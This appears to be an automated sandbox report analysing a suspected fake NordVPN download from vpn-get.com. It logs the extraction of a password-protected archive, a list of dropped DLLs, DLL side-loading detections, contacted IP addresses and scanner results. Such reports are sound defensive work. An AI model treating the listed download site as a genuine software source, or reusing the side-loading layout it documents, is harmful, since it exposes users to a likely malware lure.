Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\fontmanager.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp2v.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2m.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SAXParser.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsound.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\j2pkcs11.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_demux_dv.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\ssv.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcr120.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\PlugPlugExternalObject.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsdt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\WinRAR.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\resource.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DL100AGM.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Win32_Font.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jdwp.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FileDialog.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefHash.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GFSDK_ShadowLib.win64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfxmedia.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mpa.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_iio.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_video_framerate.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcr100.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\kcms.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JAWTAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_dec_spic.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\adbeape.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mfc100chs.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_mux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jaas_nt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_enc_pcm.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JavaAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_Modules_DataIO_1.4.22_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Surface.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javacpl.cpl
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\XMLDOMObject.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_pcm.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_ImportObject.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mfc100cht.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceCommand.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceUnique.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Image.Services.Core.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\VectorOperator.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\unpack.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\awt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2m.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\eula.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_font_t2k.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GUISkin.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_trans_video_framerate.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefSphereTree.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\dt_shmem.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_trans_video_framerate.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_mux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\gstreamer-lite.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\java.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_font.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\setup64.exe
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\npt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_enc_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JavaAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_Camera.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\verify.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\management.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\WindowsAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\d3dcompiler_47.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\ObjectDataCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Object.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\ImageMetaData.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\wget.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\TextFilter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\libGLESv2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\hprof.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceUnique.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\glib-lite.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jp2ssv.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\ImageStitcher.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_enc_mp2sr.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefTree.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\w2k_lsa_auth.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_demux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 8_2_0108B1D6 GetSystemInfo,
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data
Source: C:\Windows\SysWOW64\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\7za.exeSection loaded: C:\Windows\SysWOW64\7z.dll
Source: C:\Windows\SysWOW64\7za.exeSection loaded: C:\Windows\SysWOW64\7z.dll
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip
Source: WinRAR.exe.6.drBinary or memory string: p():tooltips_class32CMDWNDADDCMDWNDOTHERCMDWNDCONVERTCMDWNDFINDCMDWNDBENCH* %sHELPExecArcCmdDoneCMDMODETaskbarCreatedProgman%4d%%HELPCmdMode
Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1
DLL Side-Loading
12
Process Injection
13
Masquerading
1
Input Capture
1
Process Discovery
Remote Services1
Input Capture
Exfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Software Packing
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
Process Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
DLL Side-Loading
Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Obfuscated Files or Information
DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 756292 URL: https://vpn-get.com/nordvpn Startdate: 30/11/2022 Architecture: WINDOWS Score: 25 7 chrome.exe 18 14 2->7         started        10 chrome.exe 2->10         started        dnsIp3 51 192.168.2.1 unknown unknown 7->51 53 239.255.255.250 unknown Reserved 7->53 12 unarchiver.exe 4 7->12         started        14 unarchiver.exe 3 7->14         started        16 chrome.exe 7->16         started        process4 dnsIp5 19 7za.exe 201 12->19         started        23 7za.exe 45 14->23         started        45 185.215.4.79 TVHORADADAES Denmark 16->45 47 5.45.85.133 SCALAXY-ASNL Russian Federation 16->47 49 13 other IPs or domains 16->49 process6 file7 29 C:\Users\user\AppData\Local\...\adbeape.dll, PE32+ 19->29 dropped 31 C:\Users\user\AppData\...\d3dcompiler_47.dll, PE32 19->31 dropped 33 C:\Users\user\AppData\Local\Temp\...\zip.dll, PE32 19->33 dropped 41 174 other files (none is malicious) 19->41 dropped 55 DLL side loading technique detected 19->55 25 conhost.exe 19->25         started        35 C:\Users\user\AppData\Local\...\adbeape.dll, PE32+ 23->35 dropped 37 C:\Users\user\AppData\Local\...\mfc100cht.dll, PE32 23->37 dropped 39 C:\Users\user\AppData\Local\...\mfc100chs.dll, PE32 23->39 dropped 43 29 other files (none is malicious) 23->43 dropped 27 conhost.exe 23->27         started        signatures8 process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://vpn-get.com/nordvpn0%VirustotalBrowse
https://vpn-get.com/nordvpn0%Avira URL Cloudsafe
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100AGM.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100PDFL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\7z.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\7z.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\WinRAR.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.dll2%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\wget.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GFSDK_ShadowLib.win64.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GPUPerfAPIDX11-x64.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_Modules_DataIO_1.4.22_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\adbeape.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\boost_system.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AES3_4.5.16_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_Modules_DataIO_1.4.22_vs10.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PRM.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PlugPlugExternalObject.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\boost_system.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2m.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2v.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp4v.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mpa.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_pcm.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_dec_spic.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_demux_dv.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_enc_mp2sr.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_enc_pcm.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_mux_dv.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_trans_audio_converter.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_trans_video_framerate.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mfc100chs.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mfc100cht.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2m.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2v.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp4v.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mpa.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_pcm.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_dec_spic.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_demux_dv.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_enc_mp2sr.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_enc_pcm.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_mux_dv.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_audio_converter.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_video_framerate.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100chs.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100cht.dll0%ReversingLabs
